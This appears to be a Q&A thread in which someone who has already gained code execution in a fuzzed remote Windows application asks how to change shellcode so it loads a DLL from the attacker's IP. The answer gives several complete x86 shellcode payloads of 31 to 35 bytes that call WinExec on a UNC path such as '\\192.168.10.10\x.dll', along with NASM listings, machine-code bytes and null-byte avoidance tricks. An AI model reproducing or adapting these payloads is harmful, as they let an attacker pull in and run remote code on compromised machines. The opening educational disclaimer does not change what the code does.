Edit: DISCLAIMER- This is for educational purposes only as I am trying to learn shellcoding in x86 asm -- this is not a request for assistance in writing an in-the-wild exploit in any way.
Basically what I am asking for here - regardless of the "why" I am asking for it is to learn how to take a known piece of information stored in memory such as:
00xxxxxx ASCII "some information in ASCII"
And re-purpose the information stored at that address in my asm code. Would I perform a lea eax,[address]? I've tried a number of things and nothing results in the information stored in that address space appearing as expected.
--- original-ish post--- I am working on a POC shellcode x86 asm in Windows 32 bit. I've fuzzed a remote application, and am able to execute code - such as this: http://shell-storm.org/shellcode/files/shellcode-482.php
I noticed that the connecting address (attacking address) after the crash is always in the same hard coded address space showing in dump in the debugger as:
00aabbcc ASCII "192.168.1.XX."
I want to use that above shell-storm cmd.exe shellcode but somehow pass the address space containing my IP address in ASCII to it in order to download/run a rundll32.exe exploit. How would I go about referencing the address space (it does contain null first byte) and pass it along in x86 asm to cmd.exe?
This is just an example of what I used to get code execution. It also works with cmd.exe. Basically on the 4th and 5th lines I am passing "calc.exe" as 8 bytes of plain text if you will hex encoded. I want to modify this to basically execute rundll32 instead of calc or cmd where
rundll32.exe \\<HARD CODED ADDRESS REFERENCE HERE>\x.dll,0
where the above is simply where i insert the hard coded IP that i've observed in memory.
# this is the asm code for launching calc.exe successfully:
#0: 89 e5 mov ebp,esp
#2: 55 push ebp ; 4 bytes possibly with low byte = 0?
#3: 89 e5 mov ebp,esp
#5: 68 2e 65 78 65 push 0x6578652e ; ".exe"
#a: 68 63 61 6c 63 push 0x636c6163 ; "calc"
#f: 8d 45 f8 lea eax,[ebp-0x8] ; pointer to the string = mov eax, esp
#12: 50 push eax
#13: b8 c7 93 c2 77 mov eax,0x77c293c7 ; kernel32.WinExec
#18: ff d0 call eax
In the above example snippet, how would I, in lines 4-5, insert the ASCII value located at the previously mentioned memory address? That is the real meat of my question here regarding x86 asm. Would I use a memcpy? strcpy? I'm kind of a novice and definitely not a daily practitioner of asm.
After another look at the question, your actual question was about concatenating stuff with a runtime-variable C-string from a known address in the target system. Like sprintf(buf, '\\%s\x.dll', 0x00xxxxxx).
(It turns out it's actually a known constant length and value, and you were just trying to save payload size by copying it.) Update: see below for 35-byte versions that hard-code the whole string in the payload, and a 31-byte version that builds the \\...\x.dll string around the existing string instead of copying.
Copying small amounts of data is hard. x86 instructions take code-size for the opcode and for the addressing modes (register or memory) of your data, except for instructions with implicit operands like stos or movsb, or push. And even those still use bytes for the opcode. Repeated single-byte elements are hard to take advantage of. At a large scale, if you have room to write a decompressor, you could include run-length encoding or even Huffman coding. But when your data isn't much bigger than a few instructions, it's all just little tricks like in the last part of this answer.
But maybe efficiently hard-coding it can be small enough, without reading the 13-byte IP address from a known address (which takes at least 7 bytes to generate in a register with mov eax, imm32 / not eax to avoid 0 bytes in the immediate).
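As a rough illustration of why the inverted immediate helps, here is a small Python sketch (not assembly) that compares the little-endian immediate bytes of an address with those of its bitwise complement. The address 0x00ABCDEF is only a placeholder with a zero top byte, and imm32_bytes is a hypothetical helper name; the 7-byte figure corresponds to a 5-byte mov eax, imm32 plus a 2-byte not eax.

```python
import struct

def imm32_bytes(value: int) -> bytes:
    """Little-endian encoding of a 32-bit immediate, as it appears in machine code."""
    return struct.pack("<I", value & 0xFFFFFFFF)

address = 0x00ABCDEF              # placeholder address whose top byte is zero

direct = imm32_bytes(address)     # immediate for a plain mov eax, imm32
inverted = imm32_bytes(~address)  # immediate for mov eax, imm32 followed by not eax

print(direct.hex(), "contains a zero byte:", 0 in direct)
print(inverted.hex(), "contains a zero byte:", 0 in inverted)
```

The complement only avoids zero bytes when the original address has no 0xFF bytes, so this is a check worth repeating for each concrete address.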
In 32-bit mode, repeated push imm32 will build up an arbitrary-length string on the stack (in reverse order, of course).
Start by pushing an xor-zeroed register to get a 0-terminated C string. Your literal string is pure text, so I don't see any reason to worry about zero bytes other than that. But if you did, pad with a filler character and overwrite it with a byte-store from your zero register.
If it's not naturally a multiple of 4 bytes, you can sometimes expand \ to \\ or \\\ or \.\ in paths. Or use push imm8 for the last character (which you push first), also pushing 3 bytes of zeros for free. (Assuming your character is 1..127 so sign-extension produces zeros instead of 0xFF.) For this case specifically, WinExec splits on spaces so push ' ' can push a space + terminating 0 bytes.
And/or if 4-byte alignment of the stack isn't needed, use 4-byte push word imm16 for the last 2 bytes of data (operand-size prefix + opcode + 2 bytes of data = 4 bytes of code).
The payload-size overhead is 1 push opcode byte per 4 string bytes, plus the terminator, with the string size potentially padded up to a multiple of 4 bytes.
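The chunking and its cost can be sketched in Python. This is only an arithmetic model under stated assumptions: the path is an example value, split_for_push and push_cost are hypothetical helper names, and the model only covers 4-byte chunks (5-byte push imm32) plus a single trailing ASCII character (2-byte push imm8, which also supplies the terminating zeros).

```python
def split_for_push(s: bytes) -> list:
    """Split s into 4-byte chunks, in the order they would be pushed (last chunk first)."""
    chunks = [s[i:i + 4] for i in range(0, len(s), 4)]
    return chunks[::-1]

def push_cost(chunks: list) -> int:
    """Code bytes needed: 5 per push imm32, 2 for a push imm8 of one 7-bit character."""
    total = 0
    for chunk in chunks:
        if len(chunk) == 4:
            total += 5
        elif len(chunk) == 1 and chunk[0] < 0x80:
            total += 2
        else:
            raise ValueError("chunk shape not covered by this simple model")
    return total

path = rb"\\192.168.10.10\x.dll"   # example string, 21 bytes
chunks = split_for_push(path)

for chunk in chunks:
    # The little-endian value is the immediate that stores these bytes in this order.
    print(chunk, hex(int.from_bytes(chunk, "little")))
print("code bytes:", push_cost(chunks))
```

A string whose length is an exact multiple of 4 would still need a separate terminator (for example a pushed zeroed register), which this model deliberately leaves out.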
The other main option is to include the string as literal data after the payload.
...
jmp push_string_address
back_from_call:
;; pop eax ; or just leave the string address on the stack
...
push_string_address:
call back_from_call ; pushes the address of the end of the instruction and jumps
db "\\<HARD CODED ADDRESS REFERENCE HERE>\x.dll" ;, 0
; terminating zero byte in the target system will be there from its strcpy
Total overhead: 2-byte jmp rel8 + 5-byte call rel32, + 1-byte pop reg if you do pop it instead of leaving it on the stack as an arg in the 32-bit calling convention.
The call has to be backwards so the high bytes of the rel32 are FF, not 00 for a positive displacement.
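A quick Python sketch of the displacement arithmetic shows the difference. The offsets are illustrative only, and call_rel32_bytes is a hypothetical helper; the one fact relied on is that a call rel32 is E8 followed by a little-endian displacement measured from the end of the 5-byte instruction.

```python
import struct

def call_rel32_bytes(call_offset: int, target_offset: int) -> bytes:
    """Encode call rel32: opcode E8 + signed displacement from the end of the instruction."""
    rel = target_offset - (call_offset + 5)
    return b"\xE8" + struct.pack("<i", rel)

backward = call_rel32_bytes(0x09, 0x02)   # target lies before the call
forward = call_rel32_bytes(0x02, 0x30)    # target lies after the call

print(backward.hex(), "contains a zero byte:", 0 in backward)
print(forward.hex(), "contains a zero byte:", 0 in forward)
```

A small negative displacement sign-extends to FF bytes, while a small positive one is padded with 00 bytes.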
In 64-bit mode you can use RIP-relative addressing to easily avoid problematic bytes, even avoiding FF bytes if you want. But jmp / call is actually still more compact.
I don't see where you're 0-terminating your string. In the "cmd.exe " example you started with, trailing garbage after the space would still run cmd.exe but with args, until there's a 0 byte on the stack anywhere.
Here any non-zero byte in the bottom of incoming EBP will come right after the .exe in your string.
But all the stuff with ebp is a waste of space. WinExec takes 2 args: a pointer and an integer. The integer is apparently don't-care if it's out of range for being a GUI window behaviour code, so it's fine if the first 4 bytes of the string are also the UINT uCmdShow argument. (Apparently the function doesn't use that arg as scratch space before reading the string, or at all.) There's no benefit at all to saving the pre-buffer-overflow value of EBP or setting up a "stack frame".
The string breaks up perfectly into 4-byte chunks + one 1-byte that lets us get the terminator cheaply:
\\19 | 2.16 | 8.10 | .10\ | x.dl | l
This is NASM source, where 'x.dl' is a 32-bit constant that produces bytes in memory in that order. (Unlike MASM.) NASM only processes backslash as a C-style escape inside backquoted strings; single and double quotes are equivalent.
;;; NASM syntax (byte counts are in the comments)
BITS 32
push 'l'           ; 2 bytes  'l\0\0\0'
push 'x.dl'        ; 5 bytes
push '.10\'        ; 5 bytes
push '8.10'        ; 5 bytes
push '2.16'        ; 5 bytes
push '\\19'        ; 5 bytes
; 27 bytes to construct the string
;; ESP points to the data we just pushed = 0-terminated string
push esp           ; 1 byte   pushes the old value: pointer to the string
mov eax,0x77c293c7 ; b8 c7 93 c2 77   kernel32.WinExec
call eax           ; ff d0
Total: 35 bytes either way, above (push) or below (jmp/call)
NASM listing from nasm -l/dev/stdout foo.asm (creating a flat binary of the shellcode, ready to hexdump into a C string).
1 bits 32
2 top:
3 00000000 EB07 jmp push_string_address
4 back_from_call:
5 ;; pop edi ; or just leave the string address on the stack
6
7 00000002 B8C793C277 mov eax,0x77c293c7 ; kernel32.WinExec
8 00000007 FFD0 call eax
9
10 push_string_address:
11 00000009 E8F4FFFFFF call back_from_call ; pushes the address of the end of the instruction and jumps
12 0000000E 5C5C3139322E313638- db "\\192.168.10.10\x.dll" ;, 0
12 00000017 2E31302E31305C782E-
12 00000020 646C6C
13 ; terminating zero byte in the target system will be there from the strcpy we overflowed
(00000023 23 size: db $ - top is a line I included at the bottom to get NASM to calculate the size for me: 0x23 = 35 bytes.)
The string itself takes 21 bytes, but the jmp + call take 7 bytes. That's the same as the opcode overhead from 6 push imm instructions plus push esp. So we're just at the break-even point where a longer string would be more efficient with jmp/call.
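The break-even point can be checked with a small size model in Python. This is a sketch under simplifying assumptions: the string length n leaves a remainder of 1 modulo 4 (so the last character goes in a 2-byte push imm8 that also provides the terminator), the jmp fits in a rel8, and the function names are hypothetical. The shared 7 bytes of mov eax, imm32 / call eax are left out of both sides.

```python
import math

def push_version_size(n: int) -> int:
    """String data + one push opcode byte per (up to) 4 data bytes + 1-byte push esp."""
    return n + math.ceil(n / 4) + 1

def jmp_call_version_size(n: int) -> int:
    """String data + 2-byte jmp rel8 + 5-byte call rel32."""
    return n + 2 + 5

for n in (17, 21, 25):
    print(n, push_version_size(n), jmp_call_version_size(n))
```

Under this model the two approaches tie at 21 bytes of string, with push ahead for shorter strings and jmp/call ahead for longer ones.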
If that memory containing the "192.168.10.10" is in a writeable page, we can write bytes before/after it to make the C-string we want.
;; build a string around the part we want, version 1 (35 bytes)
string_address equ 0x00abcdef
string_length equ 13 ; strlen("192.168.10.10")
mov edi, -(string_address - 2) ; 5B
neg edi ; 2B EDI points 2 byte before the existing string
mov word [edi], '\\' ; 5B store 2 bytes: prepend \\
mov dword [edi + string_length+2], '\x.d' ; 7B
push 'l'
pop eax ; 'l\0\0\0'
mov ah,al ; 2B copy low byte to 2nd byte
mov [edi + string_length+2 + 4], eax ; 3B append 'll\0\0'
;;; append '\x.dll\0\0'
push edi
mov eax,0x77c293c7 ; kernel32.WinExec
call eax
Amusingly / frustratingly, this is also 0x23 = 35 bytes!!!
I feel like there should be a more efficient way to get the end of the string written. push/pop + mov to duplicate the low byte feels like a lot.
Or I could mutate one bit-pattern in EAX into another with a 5-byte sub or xor eax, imm32. (Special EAX-only encoding without a ModRM byte.) That can produce the zeros without having any in the machine code.
I see another way that saves bytes by moving EDI, and exploiting the redundancy of \ appearing in multiple places, using stosb / stosd to append AL or EAX. It saves 4 bytes. (See a previous version of the answer for "version 2".)
;; build a string around the part we want, version 3 (31 bytes)
;; Assumes DF=0 when it runs, which is guaranteed by the calling convention
;; if we got here from a ret in compiler-generated code
1 bits 32
2 top:
3 str_address equ 0x00abcdef
4 str_length equ 13 ; strlen("192.168.10.10")
5
6 00000000 BF133254FF mov edi, -(str_address - 2) ; 5B
7 00000005 F7DF neg edi ; 2B EDI points 2 byte before the existing string
8 00000007 57 push edi ; push function arg now, before modifying EDI
9
10 00000008 B85C782E64 mov eax, '\x.d' ; low byte = backslash is reusable
11 0000000D AA stosb ; 1B *edi++ = AL '\'
12 0000000E AA stosb ; 1B *edi++ = AL '\'
14 ;;; we've now prepended \ ;;; EDI is pointing at the start of the original string
15
16 0000000F 83C70D add edi, str_length ; point EDI past the end, where we want to write more
17 00000012 AB stosd ; 1B *edi = eax; edi+=4; append '\x.d'
18 00000013 6A6C push 'l'
19 00000015 58 pop eax ; 'l\0\0\0' in a reg, constructed in 3 bytes
20 00000016 AA stosb ; append 'l'
21 00000017 AB stosd ; append 'l\0\0\0'
22 ;;; append '\x.dll\0\0\0'
23
24 00000018 B8C793C277 mov eax,0x77c293c7 ; kernel32.WinExec
25 0000001D FFD0 call eax
31 bytes
(NASM listing generated with nasm foo.asm -l/dev/stdout | cut -b -30,$((30+10))-. You can strip out the first 32 bytes of each line to recover the original source with <foo.lst cut -b 32- > foo.asm so you can assemble it yourself.)
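To sanity-check the store sequence in version 3 without running it, the effect of the stosb / stosd instructions can be modelled on a Python bytearray. This is only a model of the memory writes, not assembly: build_around is a hypothetical name, the '?' bytes stand in for whatever surrounds the existing string, and DF=0 is assumed so EDI only moves forward.

```python
import struct

def build_around(existing: bytes) -> bytes:
    """Model the version-3 stores: prepend two backslashes, append '\\x.dll' and zeros."""
    mem = bytearray(b"??" + existing + b"?" * 9)  # 2 bytes before, 9 bytes after
    edi = 0                                       # EDI starts 2 bytes before the string
    eax = int.from_bytes(b"\\x.d", "little")      # mov eax, '\x.d' (low byte is a backslash)

    def stosb():
        nonlocal edi
        mem[edi] = eax & 0xFF                     # store AL, advance EDI by 1
        edi += 1

    def stosd():
        nonlocal edi
        mem[edi:edi + 4] = struct.pack("<I", eax) # store EAX, advance EDI by 4
        edi += 4

    stosb(); stosb()                              # prepend two backslashes
    edi += len(existing)                          # add edi, str_length
    stosd()                                       # append '\x.d'
    eax = ord("l")                                # push 'l' / pop eax
    stosb(); stosd()                              # append 'l', then 'l' + three zero bytes
    return bytes(mem)

result = build_around(b"192.168.10.10")
print(result)
```

The model writes 9 bytes past the end of the existing string, which is why the approach depends on that memory being writeable and safe to clobber.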
There may of course be room for more savings I missed.
Or there could be bugs that require extra bytes to fix, or different golfing.
Further ideas: The top byte of EDI is known to be zero. Maybe a 4-byte store of that at some point could get a zero in place then overwrite the bytes before?
I wonder if call far ptr16:32 with a hardcoded segment descriptor (assuming we know what Windows uses as the user-space value of cs) would be smaller than mov/call eax? No: opcode + 4-byte absolute addr + 2-byte segment = 7 bytes, same as 5-byte mov + 2-byte call eax to reach an absolute address from an unknown EIP (so we can't use 5-byte call rel32).
For more code-size optimization ideas in general, see https://codegolf.stackexchange.com/questions/132981/tips-for-golfing-in-x86-x64-machine-code